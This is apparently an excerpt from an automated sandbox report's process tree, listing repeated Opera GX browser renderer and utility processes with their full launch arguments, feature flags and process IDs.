C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --field-trial-handle=6384,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9484 /prefetch:12⤵PID:5724
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --field-trial-handle=8016,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9624 /prefetch:12⤵PID:3488
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --field-trial-handle=7448,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9552 /prefetch:12⤵PID:6196
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --field-trial-handle=9548,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9732 /prefetch:12⤵PID:7564
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=3100,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9504 /prefetch:82⤵PID:3284
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --field-trial-handle=9320,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6540 /prefetch:12⤵PID:4392
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --field-trial-handle=9892,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10028 /prefetch:12⤵PID:524
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --field-trial-handle=10056,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9992 /prefetch:22⤵PID:3908
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --field-trial-handle=10132,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9804 /prefetch:12⤵PID:4436
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --field-trial-handle=9372,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9832 /prefetch:12⤵PID:2856
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --field-trial-handle=10084,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9852 /prefetch:12⤵PID:6740
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --field-trial-handle=9444,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9468 /prefetch:12⤵PID:5992
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --field-trial-handle=10076,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10180 /prefetch:12⤵PID:6200
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --field-trial-handle=6112,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10012 /prefetch:12⤵
- Checks computer location settings
PID:396
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --field-trial-handle=7868,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9328 /prefetch:12⤵PID:7676
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --field-trial-handle=7232,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9288 /prefetch:12⤵PID:4112
-
-
